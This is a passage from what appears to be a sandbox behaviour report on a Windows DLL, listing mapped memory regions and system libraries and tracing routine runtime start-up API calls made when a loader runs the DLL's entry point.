0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 508 start_va = 0x290000 end_va = 0x290fff entry_point = 0x0 region_type = private name = "private_0x0000000000290000" filename = "" Region: id = 509 start_va = 0x430000 end_va = 0x530fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000430000" filename = "" Region: id = 510 start_va = 0x540000 end_va = 0x113ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 511 start_va = 0x72db0000 end_va = 0x72db2fff entry_point = 0x72db0000 region_type = mapped_file name = "api-ms-win-core-synch-l1-2-0.dll" filename = "\\Windows\\System32\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-synch-l1-2-0.dll") Region: id = 512 start_va = 0x72ee0000 end_va = 0x72f24fff entry_point = 0x72ee0000 region_type = mapped_file name = "97328f~1.dll" filename = "\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll") Region: id = 513 start_va = 0x762e0000 end_va = 0x762f8fff entry_point = 0x762e0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 514 start_va = 0x76700000 end_va = 0x7679ffff entry_point = 0x76700000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 515 start_va = 0x2a0000 end_va = 0x30ffff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 516 start_va = 0x77510000 end_va = 0x77544fff entry_point = 0x77510000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 517 start_va = 0x762d0000 end_va = 0x762d5fff entry_point = 0x762d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 518 start_va = 0x1200000 end_va = 0x13affff entry_point = 0x0 region_type = private name = "private_0x0000000001200000" filename = "" Region: id = 519 start_va = 0x2a0000 end_va = 0x2a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 520 start_va = 0x300000 end_va = 0x30ffff entry_point = 0x0 region_type = private name = "private_0x0000000000300000" filename = "" Region: id = 521 start_va = 0x2b0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 560 start_va = 0x14d0000 end_va = 0x15cffff entry_point = 0x0 region_type = private name = "private_0x00000000014d0000" filename = "" Region: id = 561 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 2981 start_va = 0x1260000 end_va = 0x135ffff entry_point = 0x0 region_type = private name = "private_0x0000000001260000" filename = "" Region: id = 2982 start_va = 0x1370000 end_va = 0x13affff entry_point = 0x0 region_type = private name = "private_0x0000000001370000" filename = "" Region: id = 2983 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 3231 start_va = 0x74d30000 end_va = 0x74d6ffff entry_point = 0x74d30000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 3232 start_va = 0x1140000 end_va = 0x11affff entry_point = 0x0 region_type = private name = "private_0x0000000001140000" filename = "" Region: id = 3233 start_va = 0x13b0000 end_va = 0x148efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000013b0000" filename = "" Region: id = 3234 start_va = 0x74a00000 end_va = 0x74a12fff entry_point = 0x74a00000 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 3235 start_va = 0x1630000 end_va = 0x172ffff entry_point = 0x0 region_type = private name = "private_0x0000000001630000" filename = "" Region: id = 3236 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 3237 start_va = 0x1850000 end_va = 0x194ffff entry_point = 0x0 region_type = private name = "private_0x0000000001850000" filename = "" Region: id = 3238 start_va = 0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 3239 start_va = 0x2c0000 end_va = 0x2c0fff entry_point = 0x2c0000 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 3240 start_va = 0x2d0000 end_va = 0x2d6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002d0000" filename = "" Region: id = 3241 start_va = 0x2e0000 end_va = 0x2e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002e0000" filename = "" Region: id = 3242 start_va = 0x1950000 end_va = 0x1d42fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001950000" filename = "" Region: id = 3243 start_va = 0x2c0000 end_va = 0x2c0fff entry_point = 0x2c0000 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 3244 start_va = 0x74130000 end_va = 0x7414bfff entry_point = 0x74130000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 3245 start_va = 0x74120000 end_va = 0x74126fff entry_point = 0x74120000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 3246 start_va = 0x73fc0000 end_va = 0x73fd1fff entry_point = 0x73fc0000 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 3247 start_va = 0x1da0000 end_va = 0x1e9ffff entry_point = 0x0 region_type = private name = "private_0x0000000001da0000" filename = "" Region: id = 3248 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 3249 start_va = 0x75820000 end_va = 0x75863fff entry_point = 0x75820000 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 3250 start_va = 0x1ea0000 end_va = 0x1fcffff entry_point = 0x0 region_type = private name = "private_0x0000000001ea0000" filename = "" Region: id = 3251 start_va = 0x74030000 end_va = 0x7403cfff entry_point = 0x74030000 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 3252 start_va = 0x76600000 end_va = 0x766f4fff entry_point = 0x76600000 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll") Region: id = 3253 start_va = 0x77830000 end_va = 0x77965fff entry_point = 0x77830000 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\System32\\urlmon.dll" (normalized: "c:\\windows\\system32\\urlmon.dll") Region: id = 3254 start_va = 0x77690000 end_va = 0x7771efff entry_point = 0x77690000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 3255 start_va = 0x76050000 end_va = 0x7616cfff entry_point = 0x76050000 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 3256 start_va = 0x75f40000 end_va = 0x75f4bfff entry_point = 0x75f40000 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 3257 start_va = 0x763f0000 end_va = 0x765eafff entry_point = 0x763f0000 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll") Region: id = 3258 start_va = 0x77c70000 end_va = 0x77c74fff entry_point = 0x77c70000 region_type = mapped_file name = "psapi.dll" filename = "\\Windows\\System32\\psapi.dll" (normalized: "c:\\windows\\system32\\psapi.dll") Region: id = 3510 start_va = 0x72dc0000 end_va = 0x72dd4fff entry_point = 0x72dc0000 region_type = mapped_file name = "cabinet.dll" filename = "\\Windows\\System32\\cabinet.dll" (normalized: "c:\\windows\\system32\\cabinet.dll") Region: id = 3511 start_va = 0x1730000 end_va = 0x182ffff entry_point = 0x0 region_type = private name = "private_0x0000000001730000" filename = "" Region: id = 3512 start_va = 0x2c0000 end_va = 0x2c0fff entry_point = 0x2c0000 region_type = mapped_file name = "~fgf7f5.tmp" filename = "\\Users\\EEBsYm5\\AppData\\Local\\Temp\\~fgF7F5.tmp" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\~fgf7f5.tmp") Region: id = 3513 start_va = 0x72d70000 end_va = 0x72d84fff entry_point = 0x72d70000 region_type = mapped_file name = "cabinet.dll" filename = "\\Windows\\System32\\cabinet.dll" (normalized: "c:\\windows\\system32\\cabinet.dll") Region: id = 3514 start_va = 0x2c0000 end_va = 0x2c0fff entry_point = 0x2c0000 region_type = mapped_file name = "~fgf844.tmp" filename = "\\Users\\EEBsYm5\\AppData\\Local\\Temp\\~fgF844.tmp" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\~fgf844.tmp") Region: id = 3515 start_va = 0x2c0000 end_va = 0x2c0fff entry_point = 0x2c0000 region_type = mapped_file name = "6f6c657374646d702e6f6378ff.tmp" filename = "\\Users\\EEBsYm5\\AppData\\Local\\Temp\\6F6C657374646D702E6F6378FF.tmp" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\6f6c657374646d702e6f6378ff.tmp") Region: id = 3516 start_va = 0x1fd0000 end_va = 0x20cffff entry_point = 0x0 region_type = private name = "private_0x0000000001fd0000" filename = "" Region: id = 3635 start_va = 0x2230000 end_va = 0x232ffff entry_point = 0x0 region_type = private name = "private_0x0000000002230000" filename = "" Region: id = 3636 start_va = 0x7ffd8000 end_va = 0x7ffd8fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 3637 start_va = 0x20d0000 end_va = 0x21cffff entry_point = 0x0 region_type = private name = "private_0x00000000020d0000" filename = "" Region: id = 3638 start_va = 0x7ffd7000 end_va = 0x7ffd7fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd7000" filename = "" Region: id = 3639 start_va = 0x2c0000 end_va = 0x2c0fff entry_point = 0x2c0000 region_type = mapped_file name = "6f6c657374646d702e6f6378ff.tmp" filename = "\\Users\\EEBsYm5\\AppData\\Local\\Temp\\6F6C657374646D702E6F6378FF.tmp" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\6f6c657374646d702e6f6378ff.tmp") Region: id = 3757 start_va = 0x2c0000 end_va = 0x2c0fff entry_point = 0x2c0000 region_type = mapped_file name = "6f6c657374646d702e6f6378ff.tmp" filename = "\\Users\\EEBsYm5\\AppData\\Local\\Temp\\6F6C657374646D702E6F6378FF.tmp" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\6f6c657374646d702e6f6378ff.tmp") Region: id = 3876 start_va = 0x2c0000 end_va = 0x2c0fff entry_point = 0x2c0000 region_type = mapped_file name = "6f6c657374646d702e6f6378ff.tmp" filename = "\\Users\\EEBsYm5\\AppData\\Local\\Temp\\6F6C657374646D702E6F6378FF.tmp" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\6f6c657374646d702e6f6378ff.tmp") Thread: id = 21 os_tid = 0xab0 [0031.238] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x12f904 | out: lpSystemTimeAsFileTime=0x12f904*(dwLowDateTime=0xe0578eb0, dwHighDateTime=0x1d3dfba)) [0031.238] GetCurrentProcessId () returned 0xaac [0031.238] GetCurrentThreadId () returned 0xab0 [0031.238] GetTickCount () returned 0x16f93 [0031.238] QueryPerformanceCounter (in: lpPerformanceCount=0x12f8fc | out: lpPerformanceCount=0x12f8fc*=359597074) returned 1 [0031.239] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0031.239] GetProcAddress (hModule=0x761d0000, lpProcName="FlsAlloc") returned 0x7622418d [0031.239] GetProcAddress (hModule=0x761d0000, lpProcName="FlsGetValue") returned 0x76221e16 [0031.239] GetProcAddress (hModule=0x761d0000, lpProcName="FlsSetValue") returned 0x762276e6 [0031.239] GetProcAddress (hModule=0x761d0000, lpProcName="FlsFree") returned 0x76221f61 [0031.239] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0031.239] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0031.239] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0031.240] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0031.240] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0031.240] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0031.240] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0031.240] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0031.240] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0031.240] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0031.240] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0031.240] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0031.240] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0031.240] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0031.241] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0031.241] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0031.241] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0031.241] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0031.241] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0031.241] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0031.241] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0031.242] GetCurrentThreadId () returned 0xab0 [0031.242] GetCommandLineA () returned="\"C:\\Windows\\System32\\goRcteXxZX.exe\" /dll=\"C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL\" /fn_id=Entry" [0031.242] GetEnvironmentStringsW () returned 0x347868* [0031.242] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=992, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 992 [0031.242] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=992, lpMultiByteStr=0x3009f0, cbMultiByte=992, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 992 [0031.242] FreeEnvironmentStringsW (penv=0x347868) returned 1 [0031.242] GetStartupInfoA (in: lpStartupInfo=0x12f854 | out: lpStartupInfo=0x12f854*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\goRcteXxZX.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0031.242] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0031.242] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0031.242] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0031.242] SetHandleCount (uNumber=0x20) returned 0x20 [0031.242] GetLastError () returned 0x0 [0031.242] SetLastError (dwErrCode=0x0) [0031.243] GetLastError () returned 0x0 [0031.243] SetLastError (dwErrCode=0x0) [0031.243] GetLastError () returned 0x0 [0031.243] SetLastError (dwErrCode=0x0) [0031.243] GetACP () returned 0x4e4 [0031.243] GetLastError () returned 0x0 [0031.243] SetLastError (dwErrCode=0x0) [0031.243] IsValidCodePage (CodePage=0x4e4) returned 1 [0031.243] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x12f834 | out: lpCPInfo=0x12f834) returned 1 [0031.243] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x12f300 | out: lpCPInfo=0x12f300) returned 1 [0031.243] GetLastError () returned 0x0 [0031.243] SetLastError (dwErrCode=0x0) [0031.243] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="", cchSrc=1, lpCharType=0x12f290 | out: lpCharType=0x12f290) returned 1 [0031.243] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12f714, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0031.243] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12f714, cbMultiByte=256, lpWideCharStr=0x12f078, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0031.243] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x12f314 | out: lpCharType=0x12f314) returned 1 [0031.243] GetLastError () returned 0x0 [0031.243] SetLastError (dwErrCode=0x0) [0031.243] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr="", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0031.243] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12f714, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0031.243] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12f714, cbMultiByte=256, lpWideCharStr=0x12f048, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ䥩矲狰Ā") returned 256 [0031.243] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ䥩矲狰Ā", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0031.243] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ䥩矲狰Ā", cchSrc=256, lpDestStr=0x12ee38, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0031.243] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchWideChar=256, lpMultiByteStr=0x12f614, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x0fµíõLø\x12", lpUsedDefaultChar=0x0) returned 256 [0031.243] GetLastError () returned 0x0 [0031.243] SetLastError (dwErrCode=0x0) [0031.244] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12f714, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0031.244] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12f714, cbMultiByte=256, lpWideCharStr=0x12f068, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ䥩矲狰Ā") returned 256 [0031.244] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ䥩矲狰Ā", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0031.244] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f 